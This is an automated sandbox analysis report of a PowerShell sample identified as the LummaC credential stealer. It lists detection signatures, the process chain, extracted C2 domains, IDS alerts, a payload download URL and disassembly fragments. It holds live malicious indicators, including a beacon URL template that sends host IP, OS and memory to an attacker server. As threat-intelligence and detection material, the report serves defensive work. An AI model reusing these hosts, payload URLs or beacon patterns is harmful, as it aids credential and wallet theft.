Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wEY98gM1Jj.ps1

Overview

General Information

Sample name:wEY98gM1Jj.ps1
renamed because original name is a hash value
Original sample name:0ae302e634ecbe867d0e637f64c43ecc50a535893d495551da4fdf32843e8c2b.ps1
Analysis ID:1617747
MD5:0329341197692a61c670433524de1acc
SHA1:492fd50adc54682bca41fd2a4d7a59bb0f430d7a
SHA256:0ae302e634ecbe867d0e637f64c43ecc50a535893d495551da4fdf32843e8c2b
Tags:91-206-178-120ps1user-JAMESWT_MHT
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 1948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wEY98gM1Jj.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2348 cmdline: "C:\Windows\Temp\cmd.exe" MD5: 39C2F63970A0B2B1942E7072A6C648DC)
      • cmd.tmp (PID: 2992 cmdline: "C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp" /SL5="$8007C,13626613,119296,C:\Windows\Temp\cmd.exe" MD5: B1F9D665E52C29972B50D7145D88DCE1)
        • cmd.exe (PID: 5608 cmdline: "C:\Windows\Temp\cmd.exe" /VERYSILENT MD5: 39C2F63970A0B2B1942E7072A6C648DC)
          • cmd.tmp (PID: 6040 cmdline: "C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp" /SL5="$6042A,13626613,119296,C:\Windows\Temp\cmd.exe" /VERYSILENT MD5: B1F9D665E52C29972B50D7145D88DCE1)
            • OperaAirSetup.exe (PID: 5712 cmdline: "C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe" MD5: 4A2B73CAEF012ECF99EF3546AADDEDBF)
              • MSBuild.exe (PID: 1460 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • notepad.exe (PID: 4508 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\wEY98gM1Jj.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
{"C2 url": ["DfreamWave.cyou", "shiningrstars.help", "mercharena.biz", "generalmills.pro", "stormlegue.com", "blast-hubs.com", "blastikcn.com", "nestlecompany.pro"], "Build id": "YJ1g2y--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      0000000C.00000002.2871226896.0000000005CA0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        0000000C.00000003.2849424911.00000000049C2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            0000000C.00000002.2855864758.00000000029B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
            • 0x1296ca:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
            • 0x12cc60:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
            0000000C.00000002.2856805548.0000000003371000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              Click to see the 2 entries
              SourceRuleDescriptionAuthorStrings
              12.3.OperaAirSetup.exe.4a11aa7.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                12.3.OperaAirSetup.exe.4a11aa7.0.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  12.2.OperaAirSetup.exe.5ca0000.11.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    12.2.OperaAirSetup.exe.5ca0000.11.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      12.3.OperaAirSetup.exe.49d1a87.1.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                        Click to see the 4 entries

                        System Summary

                        barindex
                        Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 172.67.172.121, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 1460, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49989
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wEY98gM1Jj.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wEY98gM1Jj.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6032, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wEY98gM1Jj.ps1", ProcessId: 1948, ProcessName: powershell.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wEY98gM1Jj.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wEY98gM1Jj.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6032, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wEY98gM1Jj.ps1", ProcessId: 1948, ProcessName: powershell.exe
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-02-18T08:28:50.143331+010020283713Unknown Traffic192.168.2.649989172.67.172.121443TCP
                        2025-02-18T08:28:50.818254+010020283713Unknown Traffic192.168.2.649990172.67.172.121443TCP
                        2025-02-18T08:28:52.030140+010020283713Unknown Traffic192.168.2.649991172.67.172.121443TCP
                        2025-02-18T08:28:53.077620+010020283713Unknown Traffic192.168.2.649992172.67.172.121443TCP
                        2025-02-18T08:28:54.189494+010020283713Unknown Traffic192.168.2.649993172.67.172.121443TCP
                        2025-02-18T08:28:55.418204+010020283713Unknown Traffic192.168.2.649995172.67.172.121443TCP
                        2025-02-18T08:28:56.663955+010020283713Unknown Traffic192.168.2.649996172.67.172.121443TCP
                        2025-02-18T08:28:58.770414+010020283713Unknown Traffic192.168.2.649997172.67.172.121443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-02-18T08:27:40.703507+010020216971A Network Trojan was detected192.168.2.64971234.120.190.48443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-02-18T08:28:50.319007+010020546531A Network Trojan was detected192.168.2.649989172.67.172.121443TCP
                        2025-02-18T08:28:51.304298+010020546531A Network Trojan was detected192.168.2.649990172.67.172.121443TCP
                        2025-02-18T08:28:59.225325+010020546531A Network Trojan was detected192.168.2.649997172.67.172.121443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-02-18T08:28:50.319007+010020498361A Network Trojan was detected192.168.2.649989172.67.172.121443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-02-18T08:28:55.907049+010020480941Malware Command and Control Activity Detected192.168.2.649995172.67.172.121443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-02-18T08:28:00.253536+010028032742Potentially Bad Traffic192.168.2.64981391.206.178.1205001TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-02-18T08:27:39.768052+010028602321Malware Command and Control Activity Detected192.168.2.64971091.206.178.1205001TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-02-18T08:27:39.780146+010028602331Malware Command and Control Activity Detected91.206.178.1205001192.168.2.649710TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-02-18T08:28:56.669366+010028438641A Network Trojan was detected192.168.2.649996172.67.172.121443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-02-18T08:27:40.792665+010018100032Potentially Bad Traffic34.120.190.48443192.168.2.649712TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-02-18T08:27:37.567553+010018100002Potentially Bad Traffic192.168.2.649709104.26.12.20580TCP
                        2025-02-18T08:27:39.768052+010018100002Potentially Bad Traffic192.168.2.64971091.206.178.1205001TCP
                        2025-02-18T08:27:40.703507+010018100002Potentially Bad Traffic192.168.2.64971234.120.190.48443TCP
                        2025-02-18T08:28:00.253536+010018100002Potentially Bad Traffic192.168.2.64981391.206.178.1205001TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: https://www.littlemoroccanthings.com/wp-content/plugins/header-footer-code-manager/images/TestLAB.exAvira URL Cloud: Label: malware
                        Source: http://91.206.178.120:5001/script_end?random_number=83035$MAvira URL Cloud: Label: malware
                        Source: https://dfreamwave.cyou/apiAvira URL Cloud: Label: malware
                        Source: https://www.littlemoroccanthings.com/wp-content/plugins/header-footer-code-manager/images/TestLAB.exeAvira URL Cloud: Label: malware
                        Source: http://91.206.178.120:5001/script_end?random_number=$randomNumberAvira URL Cloud: Label: malware
                        Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&mAvira URL Cloud: Label: malware
                        Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=MicrosoftAvira URL Cloud: Label: malware
                        Source: http://91.206.178.120:5001/script_end?random_number=83035Avira URL Cloud: Label: malware
                        Source: DfreamWave.cyouAvira URL Cloud: Label: malware
                        Source: http://91.206.178.120:5001/script_start?ip=Avira URL Cloud: Label: malware
                        Source: https://DfreamWave.cyou/piAvira URL Cloud: Label: malware
                        Source: http://91.206.178.120:5001Avira URL Cloud: Label: malware
                        Source: http://91.206.178.120:5001/script_end?random_number=Avira URL Cloud: Label: malware
                        Source: http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$raAvira URL Cloud: Label: malware
                        Source: https://DfreamWave.cyou:443/apiRunAvira URL Cloud: Label: malware
                        Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=83035Avira URL Cloud: Label: malware
                        Source: https://DfreamWave.cyou/Avira URL Cloud: Label: malware
                        Source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["DfreamWave.cyou", "shiningrstars.help", "mercharena.biz", "generalmills.pro", "stormlegue.com", "blast-hubs.com", "blastikcn.com", "nestlecompany.pro"], "Build id": "YJ1g2y--"}
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe (copy)ReversingLabs: Detection: 13%
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-IS7LO.tmpReversingLabs: Detection: 13%
                        Source: C:\Windows\Temp\cmd.exeReversingLabs: Detection: 54%
                        Source: wEY98gM1Jj.ps1Virustotal: Detection: 14%Perma Link
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.8% probability
                        Source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString decryptor: DfreamWave.cyou
                        Source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString decryptor: shiningrstars.help
                        Source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString decryptor: mercharena.biz
                        Source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString decryptor: generalmills.pro
                        Source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString decryptor: stormlegue.com
                        Source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString decryptor: blast-hubs.com
                        Source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString decryptor: blastikcn.com
                        Source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString decryptor: nestlecompany.pro
                        Source: unknownHTTPS traffic detected: 34.120.190.48:443 -> 192.168.2.6:49712 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49989 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49990 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49991 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49992 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49993 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49995 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49996 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49997 version: TLS 1.2
                        Source: Binary string: DIFXAPI.pdb source: is-JNHPI.tmp.10.dr
                        Source: Binary string: D:\a\1\SourceDirWith49CharsLengthTestForLongPaths\artifacts\obj\Microsoft.Azure.Management.ResourceManager\Debug\net461\Microsoft.Azure.Management.ResourceManager.pdbSHA256 source: is-40U72.tmp.10.dr
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: OperaAirSetup.exe, 0000000C.00000002.2868710892.000000000480C000.00000004.00000800.00020000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2872199947.0000000006050000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004371000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\SourceDirWith49CharsLengthTestForLongPaths\artifacts\obj\Microsoft.Azure.Management.ResourceManager\Debug\net461\Microsoft.Azure.Management.ResourceManager.pdb source: is-40U72.tmp.10.dr
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: OperaAirSetup.exe, 0000000C.00000002.2868710892.000000000480C000.00000004.00000800.00020000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2872199947.0000000006050000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004371000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxProxyStub\VBoxProxyStub.pdb source: is-SBTFQ.tmp.10.dr
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: OperaAirSetup.exe, 0000000C.00000002.2871342182.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004923000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdb source: OperaAirSetup.exe, 0000000C.00000002.2871342182.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004923000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: cmd.tmp, 00000008.00000003.2359613822.0000000002189000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.10.dr, cmd.exe.0.dr
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00EB0582 FindFirstFileExW,12_2_00EB0582
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E88D04 FindFirstFileW,12_2_00E88D04
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CB8D7CB0h13_2_004469D7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx]13_2_00444360
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h13_2_004484E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, eax13_2_004466FB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [eax], cx13_2_0041AF79
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-3170364Ch]13_2_0042D7E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], C8B478E8h13_2_0042D7E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-55F3AF81h]13_2_0040F7AA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then inc ebx13_2_00401040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, eax13_2_0043584E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, bx13_2_0042C80D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, eax13_2_0043581C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], al13_2_00435027
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, eax13_2_0043581C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, eax13_2_0041D952
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx]13_2_00421904
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, eax13_2_00421904
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 2C331E1Fh13_2_0043110C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then push esi13_2_0041311D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 089E115Eh13_2_004489E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp ecx13_2_00430998
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, ebx13_2_004079B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl13_2_00433A59
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl13_2_00433A59
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+576D857Eh]13_2_0042B270
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h13_2_0041DA08
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl13_2_00433AFC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl13_2_00433AFC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [eax]13_2_00444A90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+3Ch]13_2_00444A90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 2C1F0655h13_2_00444A90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ebx, edx13_2_00444A90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edx+eax*8], 025264CEh13_2_00444A90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl13_2_00433B4D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl13_2_00433B4D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, eax13_2_00446B62
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl13_2_00433B3A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl13_2_00433B3A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, eax13_2_0042DBD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-0001C279h]13_2_004113D6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov esi, dword ptr [ebp-18h]13_2_00445BD9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-31h]13_2_0042DBF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+08h]13_2_00447BB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+08h]13_2_00447C40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-60078E0Fh]13_2_0043544B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-7D570173h]13_2_0041CC25
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [ecx], si13_2_0041CC25
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+0Ch]13_2_0041F430
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-302A60D0h]13_2_0041F430
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-50C580D4h]13_2_0041F430
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx eax, byte ptr [ecx+edi]13_2_0040B4C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h13_2_0041D4CB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+08h]13_2_00447CD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]13_2_00432CE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-000000A6h]13_2_00430C90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [edi], al13_2_00434567
